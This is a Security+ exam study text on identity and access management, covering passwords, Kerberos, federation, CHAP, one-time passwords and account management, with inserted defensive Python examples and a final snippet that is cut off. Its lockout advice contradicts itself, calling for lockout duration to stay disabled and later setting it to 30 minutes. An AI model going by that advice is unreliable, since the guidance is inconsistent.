One of the first areas in IT security is giving someone access to the company's network to use resources for their job. Each person needs some form of identification so that they can prove who they are; it could be anything ranging from a username to a smart card. It needs to be unique so that the person using that identity is accountable for its use. The second part, after proving your identity, is to provide authentication for that identity; this can be done in many ways, for example by entering a password or, if you have a smart card, a PIN.

Passwords

Passwords are one of the most common ways of authenticating a user; they are also the authentication factor that is most likely to be entered incorrectly, maybe because they use upper- and lower-case characters, numbers, and special characters. Some people may have Caps Lock on without knowing it. When the password is entered, it is shown as a row of dots, so users cannot see their input; however, in the password box in Windows 10, you can press the eye icon to see the password that you have typed. This reduces the risk of people being locked out.

Default/administrator password

An administrator should have two accounts, one for day-to-day work and the other for administrative tasks. If your company is using a device such as a wireless router, the default administrative username and password should be changed as they are normally posted on the internet and could be used for hacking your device/network.

Passwords—group policy

A group policy allows security administrators to create settings once and then push them out to all machines in their domain. This could cover maybe 5-10,000 machines. It reduces configuration errors and reduces the labor required to carry out the task. One portion of a group policy deals with passwords; please look at the screenshot:


Figure 1: Password policies

Let us look at each of these going from the top to the bottom.

If I choose the password P@$$w0rd, then it contains characters from all four groups, but it would be cracked very quickly, as most password crackers replace the letter o with a zero and replace an a with the @ sign.

Store passwords using reversible encryption: This is used when a user needs to use their credentials to access a legacy (old) application. Because the passwords are stored with reversible encryption, they could effectively be stored in clear text; this is not good. Companies tend to have this option disabled at all times, as it poses a security risk.
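As an added example that is not from the book, this Python code applies a Group Policy style complexity rule (minimum length, at least three of the four character groups, and no username inside the password) and then shows why P@$$w0rd still fails: a cracker undoes the o-to-0 and a-to-@ substitutions and lands on a dictionary word. The minimum length, the leet-speak map and the tiny wordlist are constructed assumptions, not Windows settings.

```python
import re
import string

# Constructed minimum length; Group Policy lets the administrator choose this.
MIN_LENGTH = 8

# Constructed map of the substitutions a cracker's rule set tries first.
LEET_MAP = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i",
                          "3": "e", "5": "s", "7": "t"})

# Constructed tiny dictionary; a real cracker uses millions of words.
WORDLIST = {"password", "welcome", "letmein", "qwerty", "summer"}


def character_groups(password: str) -> set:
    """Return which of the four complexity groups the password uses."""
    groups = set()
    for ch in password:
        if ch.isupper():
            groups.add("upper")
        elif ch.islower():
            groups.add("lower")
        elif ch.isdigit():
            groups.add("digit")
        elif ch in string.punctuation:
            groups.add("special")
    return groups


def meets_complexity(password: str, username: str = "") -> bool:
    """Group Policy style rule: long enough, three of four groups, and the
    username must not appear inside the password."""
    if len(password) < MIN_LENGTH:
        return False
    if username and username.lower() in password.lower():
        return False
    return len(character_groups(password)) >= 3


def is_dictionary_variant(password: str) -> bool:
    """True if the password is a dictionary word in disguise: strip a trailing
    number or symbol, undo leet substitutions, lower-case, then look it up."""
    base = re.sub(r"[\W\d_]+$", "", password)   # 'Summer2019' -> 'Summer'
    base = base.translate(LEET_MAP).lower()     # 'P@$$w0rd'   -> 'password'
    return base in WORDLIST


def assess(password: str, username: str = "") -> str:
    """Combine the policy check with the cracker's-eye view."""
    if not meets_complexity(password, username):
        return "rejected: fails complexity policy"
    if is_dictionary_variant(password):
        return "weak: passes policy but is a dictionary word in disguise"
    return "acceptable"


if __name__ == "__main__":
    for candidate in ("P@$$w0rd", "password", "Summer2019", "Xk7#pLq2vB"):
        print(f"{candidate:12} {assess(candidate)}")
```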

When purchasing devices, you should always change the default password that the manufacturer has set up to prevent someone hacking into your device.

Once you are locked out your account is disabled:


Figure 2: Account lockout

Know the password options and types of password attacks thoroughly.

Account lockout duration: Both Account lockout duration and Reset account lockout counter after should not be enabled. If these are disabled, the person who is locked out will have to contact the security administrator to have their password reset; this way, the administrator knows who keeps forgetting their password and knows to keep monitoring them.

Password recovery

People can be locked out from time to time by forgetting their password. They can reset their password by going to a portal, selecting the forgotten password option, filling in personal details, and having the password reset option send a code to their phone via SMS or by email.

Some desktop operating systems allow you to create a password reset disk that you can save to an SD card or a USB drive; this is not normally used in a corporate environment.

Authentication factors

There are different authentication factors that range from something you know, for example a password, to something you are, for example an iris scan. The following are the different authentication factors:


Figure 3: Hardware token and key fob used with proximity card

Number of factor examples

Let us look at combining the different factors to determine single factor, dual factor, or multifactor. Here are different factor examples:

The number of factors is determined by the different numbers of factor groups being mentioned.

Transitive trust

Transitive trust is where you have a parent domain and maybe one or more child domains; these would be called trees. Refer to the diagram:


Figure 4: Transitive trust

Between the parent domain and each child domain there is a two-way transitive trust, where resources can be shared both ways. Because the parent domain trusts both child domains A and B, it can be said that Child A transitively trusts Child B, as long as the administrator in Child B wishes to give someone from Child A access to resources, and vice versa. Think of a domain as being people from the same company.

When the exam mentions third-party to third-party authentication, then that can only be federation services.

Federation services

Federation services are used when two different companies want to authenticate between each other when they participate in a joint venture. Think of two car manufacturers wanting to produce the best car engine in the world. Both companies have experts on engines but they want to work together to produce a super engine.

The companies don't want to merge with each other; they want to retain their own identity and have their own management in place. These are known, to each other, as third parties.

Each of these companies will have their own directory database, for example an active directory that will only have users from their domain. Therefore, normal domain authentication will not work. Let us now look at the two different domains and their directory databases:


Figure 5: Directory databases

Company A has three users in its Active Directory: Mr Red, Mr Blue, and Mr Green. Company B also has three users: Mr Orange, Mr Purple, and Mr Yellow. This means that each company can only change passwords for the people in its own domain.

If Mr Orange were to try to access the Company A domain, he would need an account. Since he does not have one, the security administrator from Company A has no way of authenticating him. Company A then needs to make an agreement with Company B to set up a federation trust, where the people from the other domain use alternative credentials instead of a username and password or a smart card and PIN. They use extended attributes:

User-extended attributes are extended attributes used by their directory services; they are, in addition to the basic attributes:

They both have decided that the extended attributes that they will use will be the user's email address. Because an email address is easy to find or guess they will also need to use their domain password. This is known as a claim. When the exam talks about authentication using the phrase third party or extended attributes, think of federation services.

The two companies need to exchange the extended attribute information and need a special protocol to do that, so they use Security Assertion Markup Language (SAML), as it is XML-based authentication:


Figure 6: SAML

Federation Services—Authentication: In this scenario Mr. Yellow is going to authenticate himself with Company A so that he can access limited resources. He contacts Company A through a web browser and it asks him for his email address and password:


Figure 7

Federation Services—Exchange of Extended Attributes: Company A now uses SAML to send the authentication details of Mr Yellow to Company B. Mr Yellow's domain controller confirms that they are correct:


Figure 8: Extended attributes sent to Company A using SAML

Once Company B confirms that Mr Yellow's extended attributes are valid the Company A domain controller sends a certificate to Mr Yellow's laptop; this certificate is used next time for authentication.

When the exam mentions authentication using extended attributes, they can only be federation services.

Shibboleth

Shibboleth is an open source federation service product that uses SAML authentication. It would be used in a small federation service environment.

Single sign-on

Single sign-on is used in a domain environment; this is where someone logs in to the domain and can then access several resources, such as the file or email server, without needing to input their credentials again. Think of it as an all-inclusive holiday where you check into your hotel and the receptionist gives you a wristband that you show when you want to consume food and drink. Federation services and Kerberos (the Microsoft authentication protocol) are both good examples of single sign-on. You log in once and access all of your resources without needing to enter your credentials again.

Installing and configuring identity and access services

Identity management in a corporate environment uses a directory database. We are going to look at Microsoft's Active Directory, where a protocol called Lightweight Directory Access Protocol (LDAP) manages the users and groups. Let us look at how it works.

LDAP

Most companies provide identity and access services through a directory service that stores objects such as users and computers as X.500 objects; these were developed by the International Telecommunication Union (ITU). These objects form what is called a distinguished name and are organized and stored by the Lightweight Directory Access Protocol (LDAP).

There are only three values in X500 objects; these are DC (domain), Organization Unit (OU), and CN (anything else).

In this example, we have a domain called Domain A and an organizational unit called Sales; this is where all of the sales department users and computers would reside. We can see inside the Sales OU a computer called Computer 1:


Figure 9: Active Directory

When creating the X500 object, we start off with the object itself, Computer 1, and then continue up through the structure. As Computer 1 is neither an OU nor a domain, we give it a value of CN; then we move up the structure to Sales. As it is an OU, we give it that value. Computer 1 is a CN, Sales is an OU, and the domain is split into two portions, each having the value DC. The distinguished name is here:

CN=Computer1, OU=Sales, DC=DomainA, DC=com

The way it is stored in the active directory can be viewed using a tool called ADSI Edit:


Figure 10: ADSI Edit

LDAP is the active directory storeman responsible for storing the X500 objects; when the Active Directory is searched, then LDAP provides the information required. LDAPS is the secure version of LDAP.
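As an added example that is not from the book, the Python code below walks the tree from Figure 9 the way the text describes (CN for the object, OU for each container nearest first, one DC per domain label) and also parses a distinguished name back into its parts. The tree labels are the book's; the extra object named "Smith, John" is a constructed case showing why the comma in a value must be escaped (RFC 4514), otherwise the name reads as an extra RDN.

```python
# Characters that must be escaped inside an RDN value (RFC 4514).
SPECIAL = set(',+"\\<>;=')


def escape_rdn_value(value: str) -> str:
    """Backslash-escape special characters, a leading '#', and leading or
    trailing spaces so the value cannot be confused with RDN separators."""
    out = []
    last = len(value) - 1
    for i, ch in enumerate(value):
        if ch in SPECIAL or (ch == "#" and i == 0) or (ch == " " and i in (0, last)):
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def build_dn(obj_name: str, ou_path: list, domain: str) -> str:
    """Walk up from the object: CN for the leaf, then OUs with the container
    nearest the object first, then one DC per DNS label of the domain.
    ou_path is given top-down, e.g. ['Europe', 'Sales'] for Sales under Europe."""
    parts = ["CN=" + escape_rdn_value(obj_name)]
    parts += ["OU=" + escape_rdn_value(ou) for ou in reversed(ou_path)]
    parts += ["DC=" + escape_rdn_value(label) for label in domain.split(".")]
    return ",".join(parts)


def parse_dn(dn: str) -> list:
    """Split a DN on unescaped commas and return [(attribute, value), ...]
    with escapes removed. Tolerates the 'CN=x, OU=y' spacing used in the book."""
    rdns, current, i = [], [], 0
    while i < len(dn):
        ch = dn[i]
        if ch == "\\" and i + 1 < len(dn):      # escaped char: keep it literally
            current.append(dn[i + 1])
            i += 2
            continue
        if ch == ",":                            # unescaped comma ends the RDN
            rdns.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    rdns.append("".join(current))
    result = []
    for rdn in rdns:
        attr, _, value = rdn.partition("=")
        result.append((attr.strip().upper(), value))
    return result


def domain_of(dn: str) -> str:
    """Reassemble the DNS domain from the DC components."""
    return ".".join(v for a, v in parse_dn(dn) if a == "DC")


if __name__ == "__main__":
    print(build_dn("Computer1", ["Sales"], "DomainA.com"))
    print(build_dn("Smith, John", ["Sales"], "DomainA.com"))
    print(parse_dn("CN=Computer1, OU=Sales, DC=DomainA, DC=com"))
```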


Kerberos

Kerberos is the authentication protocol used by Active Directory; it was developed at MIT, and Microsoft adopted it as the default domain authentication protocol with Windows 2000. For the exam, it is the authentication protocol that uses tickets and that is protected against replay by timestamps (and by sequence numbers carried in the authenticator). The user first obtains a ticket granting ticket (TGT) from the domain controller and later exchanges it for a service ticket for each server they want to use. It is important that the clocks on all servers and computers are within five minutes of each other; time is synchronized over the network from a reference time source using Stratum time servers, which the Security+ exam covers.

Stratum time servers: The stratum level describes how far a time server is from the reference clock. Stratum 0 is the reference time source itself, such as an atomic clock or a GPS receiver; the way to remember this is that you can draw a clock face inside a zero, making it the time source. A Stratum 1 time server is connected directly to a Stratum 0 device, and a Stratum 2 time server obtains its time from a Stratum 1 server over a network connection; each further hop adds one to the stratum number:


Figure 11: Stratum time servers

A TGT session is where a user sends their credentials (username and password, or a smart card and PIN) to a domain controller, which starts the authentication process; once the user has been confirmed, it sends back a ticket granting ticket that has, by default, a 10-hour lifespan. The TGT is encrypted with a key that only the domain controller knows, so the user cannot read or alter it:


Figure 12: TGT session

Single sign-on/mutual authentication: Kerberos provides single sign-on because the user logs in only once and then uses their TGT to prove who they are; the domain controller exchanges the TGT for a service ticket for the server on which the user wants to access resources. In the example here, the user presents a service ticket to an email server and the two mutually authenticate:


Figure 13: Mutual authentication

The preceding diagram shows the logged-in user presenting the encrypted service ticket, together with an authenticator containing the current timestamp, to the mail server. The mail server decrypts the ticket, checks that the timestamp is within 5 minutes of its own clock, and returns the timestamp to the user encrypted with the shared session key; only a server holding the right key could produce that reply, so the user now knows that the server is genuine. This is how Kerberos completes mutual authentication.

You need to remember that, for the exam, Kerberos is the authentication protocol that uses tickets. It also prevents replay attacks: each authenticator carries a timestamp (and optionally a sequence number), and the server rejects any authenticator that is outside the five-minute window or that it has already seen within that window.
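To make the timestamp, skew and replay checks concrete, here is an added example that is not from the book: a simplified model of the Kerberos AP-REQ/AP-REP exchange between the logged-in user and the mail server. Real Kerberos encrypts the authenticator with the session key delivered inside the service ticket; this model uses an HMAC under that session key instead, which is enough to show why a captured authenticator cannot be replayed and how the server's reply gives mutual authentication. The principal names and key are invented.

```python
# Added example (not from the book): a simplified model of the Kerberos
# AP-REQ / AP-REP exchange that gives mutual authentication and replay
# protection. Real Kerberos encrypts the authenticator with the session key;
# here an HMAC under the session key stands in for that, which is enough to
# show the timestamp, skew and replay-cache checks. Names are made up.
import hashlib
import hmac
import json
from typing import Dict, Optional, Set, Tuple

MAX_SKEW = 300  # seconds: the five-minute Kerberos default


def _tag(key: bytes, payload: Dict) -> str:
    """Integrity tag over a canonical JSON encoding of the message body."""
    data = json.dumps(payload, sort_keys=True).encode()
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def make_authenticator(session_key: bytes, client: str, seq: int, now: float) -> Dict:
    """Client side: the authenticator that accompanies the service ticket."""
    body = {"client": client, "ctime": int(now), "seq": seq}
    return {"body": body, "tag": _tag(session_key, body)}


class KerberizedService:
    """Server side: verifies authenticators and answers with an AP-REP."""

    def __init__(self, session_key: bytes, max_skew: int = MAX_SKEW):
        self.key = session_key
        self.max_skew = max_skew
        self.seen: Set[Tuple[str, int, int]] = set()  # replay cache

    def verify(self, auth: Dict, now: float) -> Tuple[bool, str, Optional[Dict]]:
        body = auth["body"]
        if not hmac.compare_digest(auth["tag"], _tag(self.key, body)):
            return False, "bad tag: wrong session key or tampered authenticator", None
        if abs(int(now) - body["ctime"]) > self.max_skew:
            return False, "clock skew too great", None
        fingerprint = (body["client"], body["ctime"], body["seq"])
        if fingerprint in self.seen:
            return False, "replay detected", None
        self.seen.add(fingerprint)
        # entries older than the skew window can never match again, so drop them
        self.seen = {f for f in self.seen if abs(int(now) - f[1]) <= self.max_skew}
        # AP-REP: echo the client's timestamp under the session key, proving the
        # service holds the key that was sealed inside the ticket
        reply = {"ctime": body["ctime"], "seq": body["seq"]}
        return True, "ok", {"body": reply, "tag": _tag(self.key, reply)}


def client_accepts_reply(session_key: bytes, sent: Dict, reply: Optional[Dict]) -> bool:
    """Client side of mutual authentication: the reply must carry our own
    timestamp and a tag that only a holder of the session key could compute."""
    if reply is None:
        return False
    if not hmac.compare_digest(reply["tag"], _tag(session_key, reply["body"])):
        return False
    return reply["body"]["ctime"] == sent["body"]["ctime"]


if __name__ == "__main__":
    key = b"session-key-delivered-inside-the-service-ticket"  # made up
    mail = KerberizedService(key)
    t0 = 1_700_000_000
    auth = make_authenticator(key, "ian@DOMAINA.COM", 1, t0)
    ok, why, rep = mail.verify(auth, t0 + 10)
    print(ok, why, client_accepts_reply(key, auth, rep))   # True ok True
    print(mail.verify(auth, t0 + 20)[1])                    # replay detected
```

Note that the replay cache only needs to remember authenticators for as long as the skew window: anything older is rejected by the timestamp check before the cache is consulted, which is why a clock that drifts by more than five minutes locks a machine out of every Kerberized service.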

NT LAN Manager (NTLM): NTLM is a legacy challenge-response authentication protocol. The password hash it relies on, the NT hash, is an unsalted MD4 hash of the password, which is very fast to crack, and the protocol is susceptible to the pass-the-hash attack, in which a captured hash is used to authenticate without ever knowing the password. Although Kerberos replaced it as the default with Windows 2000, NTLM is still enabled as a fallback in many Windows environments, so it should be restricted or disabled wherever possible.

Internet-based open source authentication

More and more people are accessing web-based applications and need an account to log in; however, the companies hosting these applications do not want to be responsible for creating and managing those accounts. They use OAuth 2.0, which lets a user grant the application limited access to their account at another provider, and OpenID Connect, which is built on top of OAuth 2.0 and lets the provider (such as Google or Facebook) authenticate the user on the application's behalf.

Authentication, authorization, and accounting (AAA) servers

The two main AAA servers are Remote Authentication Dial-In User Service (RADIUS), an open standard implemented by many vendors (Microsoft's implementation is Network Policy Server), and Cisco's Terminal Access Controller Access-Control System Plus (TACACS+). Both provide authentication, authorization, and accounting. RADIUS uses UDP ports 1812 (authentication) and 1813 (accounting) and encrypts only the password in its packets, whereas TACACS+ uses TCP port 49 and encrypts the whole packet body.

Authentication

A Virtual Private Network (VPN) allows someone working remotely, either from a hotel room or from home, to connect securely through the internet to the corporate network. More information on how a VPN operates is in Chapter 5, Understanding Network Components, of this book; in this chapter we look at VPN authentication methods:


Figure 14: VPN


Figure 15: Challenge-Handshake Authentication Protocol

The Challenge-Handshake Authentication Protocol (CHAP) proves that the client knows the password without ever sending it across the link:

    1. The client makes a connection request to the remote access server (RAS).

    2. The RAS server replies with a challenge, which is a random string.

    3. The client hashes the challenge together with its password (MD5 over a one-byte identifier, the password, and the challenge) and sends the result back.

    4. The RAS server performs the same calculation with the password it has stored for the user. If both values match, the client is logged on.
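The four steps above, as an added example that is not from the book, with both sides of the exchange in one file. The response is computed exactly as RFC 1994 specifies, MD5 over the identifier, the secret and the challenge; the user name and secret are constructed for the illustration.

```python
# Added example (not from the book): the CHAP exchange from RFC 1994, with
# both sides in one file. The response is MD5(identifier || secret || challenge).
# User names and secrets are constructed for the illustration.
import hashlib
import hmac
import os
from typing import Dict, Tuple


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """What the client sends back: MD5 over the 1-byte identifier, the
    shared secret and the challenge, in that order."""
    return hashlib.md5(bytes([identifier & 0xFF]) + secret + challenge).digest()


class ChapServer:
    """Remote access server side. CHAP needs the secret itself (not a hash of
    it) to recompute the response, so the store holds the cleartext secret."""

    def __init__(self, secrets: Dict[str, bytes], challenge_len: int = 16):
        self.secrets = secrets
        self.challenge_len = challenge_len
        self.pending: Dict[int, Tuple[str, bytes]] = {}  # identifier -> (user, challenge)
        self.next_id = 0

    def challenge(self, username: str) -> Tuple[int, bytes]:
        """Step 2: answer a connection request with a fresh random challenge."""
        identifier = self.next_id
        self.next_id = (self.next_id + 1) & 0xFF
        chal = os.urandom(self.challenge_len)
        self.pending[identifier] = (username, chal)
        return identifier, chal

    def check(self, identifier: int, response: bytes) -> bool:
        """Step 4: recompute with the stored secret and compare. The challenge is
        consumed whether or not the check passes, so a captured response cannot
        be replayed against the same challenge."""
        entry = self.pending.pop(identifier, None)
        if entry is None:
            return False
        username, chal = entry
        secret = self.secrets.get(username)
        if secret is None:
            return False
        expected = chap_response(identifier, secret, chal)
        return hmac.compare_digest(expected, response)


def chap_client(secret: bytes, identifier: int, challenge: bytes) -> bytes:
    """Step 3: the client never sends the password, only the hashed response."""
    return chap_response(identifier, secret, challenge)


if __name__ == "__main__":
    ras = ChapServer({"ian": b"correct horse battery staple"})   # constructed
    ident, chal = ras.challenge("ian")
    resp = chap_client(b"correct horse battery staple", ident, chal)
    print("logon:", ras.check(ident, resp))                        # True
    print("replay of captured response:", ras.check(ident, resp))  # False
```

Two caveats a practitioner should keep in mind: a sniffer that captures the challenge and the response cannot log in with them, but it can run an offline dictionary attack against the pair because MD5 is fast; and the server must hold the secret in cleartext (MS-CHAPv2 uses the NT hash instead). Both are reasons CHAP is only acceptable inside an already encrypted tunnel today.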

Learning about Identity and access management controls

In this section, we are going to look at identity and access management controls, starting with biometrics and moving on to security tokens and certificates. Let us first look at biometric controls, followed by identity management using certificates.

Biometrics

Biometrics is a method of authentication using an individual's physical characteristics, for example a fingerprint, since no two people have the same fingerprints. In 1892, Inspector Eduardo Alvarez of Argentina made the first fingerprint identification in a criminal case, against Francisca Rojas, who had murdered her two sons and cut her own throat in an attempt to place the blame on someone else; the fingerprint evidence proved that she was guilty. We will now look at the types of biometrics:


Figure 16: iPhone fingerprint scanner

Retina and iris scanners both look at an individual's eye; the scanners themselves are physical devices.

Microsoft released a facial recognition feature called Windows Hello with Windows 10; it uses an infrared camera, either built in or attached via USB. Because it works in infrared, it copes much better with poor lighting than facial recognition systems that rely on a visible-light camera, and it is not fooled by a photograph.


Figure 17: Crossover error rate

The crossover error rate (CER) is the point at which the false acceptance rate (FAR, Type II errors, where an impostor is let in) equals the false rejection rate (FRR, Type I errors, where a legitimate user is turned away). The lower the CER point is on the graph, the fewer errors the system makes; a CER near the top of the graph indicates many errors and a system that will be difficult to support, in which case you would change your biometric system.

Security tokens and devices

There are different types of tokens with different lifetimes; let us look at the difference between a Time-Based One-Time Password (TOTP), which changes every 30 to 60 seconds, and an HMAC-based One-Time Password (HOTP), which is generated from a counter and stays valid until it is used:


Figure 18: TOTP
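The two token types differ only in where the counter comes from, and the following added example (not code from the book) shows this in working form: HOTP as defined in RFC 4226, TOTP as defined in RFC 6238, and the two server-side checks a practitioner needs, a small time window for clock drift and a look-ahead window for HOTP resynchronisation. The secret used is the RFC test key, so the outputs can be compared with the published test vectors.

```python
# Added example (not from the book): RFC 4226 HOTP and RFC 6238 TOTP with the
# server-side checks a practitioner needs: a small time window for clock drift
# and a look-ahead window for HOTP resynchronisation. The secret below is the
# RFC test key, so the outputs can be compared with the published vectors.
import hashlib
import hmac
import struct
import time
from typing import Optional


def hotp(secret: bytes, counter: int, digits: int = 6, algo=hashlib.sha1) -> str:
    """HOTP: HMAC over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    binary = (((mac[offset] & 0x7F) << 24) | (mac[offset + 1] << 16)
              | (mac[offset + 2] << 8) | mac[offset + 3])
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret: bytes, at_time: Optional[float] = None, step: int = 30,
         digits: int = 6, algo=hashlib.sha1) -> str:
    """TOTP: HOTP where the counter is the number of steps since the Unix epoch."""
    if at_time is None:
        at_time = time.time()
    return hotp(secret, int(at_time) // step, digits, algo)


def verify_totp(secret: bytes, code: str, at_time: Optional[float] = None,
                step: int = 30, digits: int = 6, window: int = 1) -> bool:
    """Server check: accept the current step and +/- window steps for drift."""
    if at_time is None:
        at_time = time.time()
    base = int(at_time) // step
    return any(hmac.compare_digest(hotp(secret, base + d, digits), code)
               for d in range(-window, window + 1))


def verify_hotp(secret: bytes, code: str, last_counter: int,
                look_ahead: int = 10, digits: int = 6) -> Optional[int]:
    """Server check with resynchronisation: the token may have been pressed a
    few times without logging in, so try the next look_ahead counters. Returns
    the counter to store (so the same code can never be accepted again) or None."""
    for counter in range(last_counter + 1, last_counter + 1 + look_ahead):
        if hmac.compare_digest(hotp(secret, counter, digits), code):
            return counter
    return None


if __name__ == "__main__":
    K = b"12345678901234567890"           # RFC 4226 / 6238 test key
    print([hotp(K, c) for c in range(3)])  # ['755224', '287082', '359152']
    print(totp(K, 59, digits=8))           # 94287082
    print(totp(K))                         # whatever the current 30-second step gives
```

The HOTP verifier must store the counter it accepted and refuse anything at or below it; without that, a code that was sniffed once remains valid for as long as the user does not press the token. The TOTP verifier has no such state, which is why the time window must stay small and why both sides need synchronized clocks.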

Certification-based authentication

Certificate-based authentication is very popular; when the certificate is held on a smart card that is unlocked with a PIN, it gives two-factor authentication (something you have and something you know), which is more secure than single-factor authentication such as a username and password. We will now look at various types:

Port-based authentication

IEEE 802.1X is a port-based network access control protocol that authenticates a device or user when it connects to a switch port or to a wireless access point; the switch or access point passes the credentials (often a certificate, carried in EAP) to an authentication server such as RADIUS before the port is allowed onto the network.

Authentication with a password with a short lifespan will be a Time-Based One-Time Password (TOTP).

Common account management practices

Account management ranges from account creation when someone starts to its disablement when they leave the company. Fully understanding these concepts is crucial to obtaining the Security+ certification.

Account types

In a Microsoft Active Directory environment, each user needs an account to access the network, and each account has a Security Identifier (SID) linked to it. When I create a user called Ian, the account may have a SID such as S-1-5-21-2345678-3456789-4567890-1105. When the account is deleted the SID is gone, and any new account gets a new SID.

For example, a member of the IT team deletes a user account called Ian with the SID S-1-5-21-2345678-3456789-4567890-1105 and quickly creates another account called Ian; this account cannot access Ian's old resources because it has a new SID, S-1-5-21-2345678-3456789-4567890-1106. Reading from left to right, the first portion identifies the domain and the final number, the relative identifier (RID), is a serial number that is never reused.

There are various different types of user accounts and these are heavily tested in the Security+ exam; you must know when you would need each account:

A guest speaker should be allocated a sponsored guest account.

A service account is a type of administrative account used to run an application or service, rather than for a person to log in with.

When you need to monitor or audit to an employee level, you must eliminate the use of shared accounts.

If you do not change the default username and password on household devices, a cybercriminal can use the published defaults to get into your home network. This includes baby monitors, TVs, ovens, and refrigerators.

Account creation

Multinational corporations create hundreds of accounts annually and need a standardized format for usernames; this is called a standard naming convention. Account templates are copied and modified with the details of new employees. One common convention is first initial followed by surname:

If you have a John Smith and a Jack Smith, that convention gives two J Smiths, so you may also use a middle initial, J A Smith, or a number at the end, J Smith1, to make them unique.

All user accounts need to be unique so that each person is responsible for their own account. If you leave your computer logged on to the network while you go for a coffee and someone deletes data using your account, then you are held responsible. Good practice is to lock your screen whenever you leave your desk to prevent this.

Without a standard naming convention, accounts would be created differently and cause chaos when you tried to find users in your directory service.

Employees moving departments

When employees move between departments, IT teams normally modify their existing account for the new department rather than creating a new one. In the Security+ exam, however, when people move department they are given a new account, and the old account remains active (and a risk) until it has been disabled.

Disabling an account

There are a few times when the IT team will disable accounts as good practice; let us look at the reasons for this:

When an employee leaves the company, the first step is to disable the account rather than delete it. You should also reset the password so that the former account holder cannot use it.

Account recertification

Account recertification is a process where an auditor reviews all of the user accounts. The auditor has a matrix showing all of the active accounts and the privileges and access each should have. If the auditor finds anything wrong, he reports it to management, who will then either write a new account policy or change how accounts are managed through change management. For the purpose of the exam, think of the auditor as a snitch: he never takes any action himself but reports his findings to management.

Account maintenance

Account maintenance is ensuring that accounts are created in accordance with the standard naming convention, disabled when the employee initially leaves, then deleted maybe 30 days later.

Account monitoring

If you wish to find out when a user account has been granted a new set of privileges, this can only be done by actively monitoring the accounts. This can be automated with a security information and event management (SIEM) system that collects the security logs and alerts you to changes. A periodic user account review will not tell you in time, as there could be 6 to 12 months between reviews and you may need to know immediately that an account has been given higher privileges.

Security Information and Event Management

Security information and event management (SIEM) is considered an IT best practice, and for regulated industries it is often an audit compliance requirement. It supports IT service reliability by getting the most value out of event logs: it aggregates logs from many systems, parses and normalizes non-standard log formats, correlates events, and can filter out false positives. If a SIEM fails to report something that actually happened, the usual cause is a filter or correlation rule that was set up in error:


Figure 19: Account expiry

If a person moves department and their old account is still being used, then we should get an auditor who will perform a user account review.


Figure 20: Time and day restrictions

For example, a toy factory may employ university students to work prior to the busy Christmas period with three different shift patterns, 6 a.m.-2 p.m., 2-10 p.m. and 10 p.m.-6 a.m. Each employee will have a time and day restriction in place so that they can log in only for their individual shift times.

If a time restriction is to be placed on a group of contractors, rule-based access control is used. Time and day restrictions are applied to individual accounts.

Group based access control

When a company has a large number of users it is difficult to give each user individually the access that they need to do their job. Groups are created containing all of the users in a department; for example, the sales group contains everyone who works in sales, and the group is given access to resources such as a printer or a file structure. If you use group-based access and have new employees or interns, you may create another group for them with lower permissions.

For example, in a large corporation there are 25 employees who work in marketing and need full access to the marketing file share. Next week three new interns start with the company, but they need only read access to the same share. We therefore create two groups: one for the 25 marketing employees with full control of the share, and one for the interns with read-only access to it.

If group-based access is mentioned in an exam question, then the answer will be a group-based access solution.

Credential management

The username and password that someone uses to access a network or an application are called credentials. Users often have several sets of credentials, for their local network and for their Facebook, Hotmail, or Twitter accounts, and it would be a serious security risk to use the same password for any two of these. Windows 10 has a Credential Manager that stores credentials in two categories: Web Credentials, for web portals, and Windows Credentials, which includes generic credentials. When you log in to an account and tick Remember Password, the details can be stored in Credential Manager so that they are all kept in one place:


Figure 21: Credential manager

User account reviews

An auditor carries out a user account review periodically to ensure that old accounts are not being used after an employee has moved department or left the company. The auditor also checks that every employee has the permissions and privileges they need to do their job and no more. Least privilege is giving a person only the access that they require.

Practical exercise – password policy

In this practical exercise, you need to prevent users from resetting their password to the same value. The company should not allow users to change their password more than once every three days, and passwords must be complex. A user must use 12 different passwords before they can reuse the original one. You also need to stop an attacker from making more than five attempts at guessing a password:

  1. On a Windows 10 desktop, type gpedit.msc to open the Local Group Policy Editor; on a domain controller, go to Server Manager | Tools | Group Policy Management and edit the Default Domain Policy.

  2. Under Computer Configuration, expand Windows Settings.

  3. Select Security Settings.

  4. Expand Account Policies, then select Password Policy.

  5. Select Enforce password history, enter 12 passwords remembered, and press OK.

  6. Select Minimum password age, enter 3 days, and press OK.

  7. Select Password must meet complexity requirements, select the Enabled radio button, and press OK.

  8. Go back to Account Policies and select Account Lockout Policy.

  9. Select Account lockout threshold, change the value to five invalid logon attempts, and press OK. Windows will suggest 30 minutes for the two related settings, Account lockout duration and Reset account lockout counter after; accept the suggested values.
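To see how these settings interact, here is an added example that is not from the book: a small model of the password and lockout policy from the exercise (12 passwords remembered, 3-day minimum age, complexity, lockout after 5 bad attempts, 30-minute lockout duration and reset window) that can be exercised offline. The user name, passwords and timestamps are constructed, and storing the history as salted PBKDF2 hashes is a simplification of how Windows stores passwords.

```python
# Added example (not from the book): a model of the password and lockout
# settings from the exercise (12 passwords remembered, 3-day minimum age,
# complexity, 5 bad attempts) so the behaviour can be tried offline. The
# lockout duration and reset-counter window are the other two settings of
# the Account Lockout Policy; values and user names here are constructed.
# Passwords are stored as PBKDF2 hashes with a per-account salt, which is a
# simplification of how Windows stores them.
import hashlib
import hmac
import os
import string
from typing import List, Optional, Tuple

DAY = 24 * 60 * 60
PBKDF2_ROUNDS = 10_000  # kept low so the example runs quickly


class PasswordPolicy:
    def __init__(self, history: int = 12, min_age_days: int = 3,
                 lockout_threshold: int = 5, lockout_duration_s: int = 30 * 60,
                 reset_counter_s: int = 30 * 60):
        self.history = history
        self.min_age_s = min_age_days * DAY
        self.lockout_threshold = lockout_threshold
        self.lockout_duration_s = lockout_duration_s
        self.reset_counter_s = reset_counter_s

    @staticmethod
    def is_complex(password: str, username: str) -> bool:
        """Windows-style complexity: at least six characters, not containing the
        account name, and three of the four character classes."""
        if len(password) < 6 or username.lower() in password.lower():
            return False
        classes = (any(c.islower() for c in password),
                   any(c.isupper() for c in password),
                   any(c.isdigit() for c in password),
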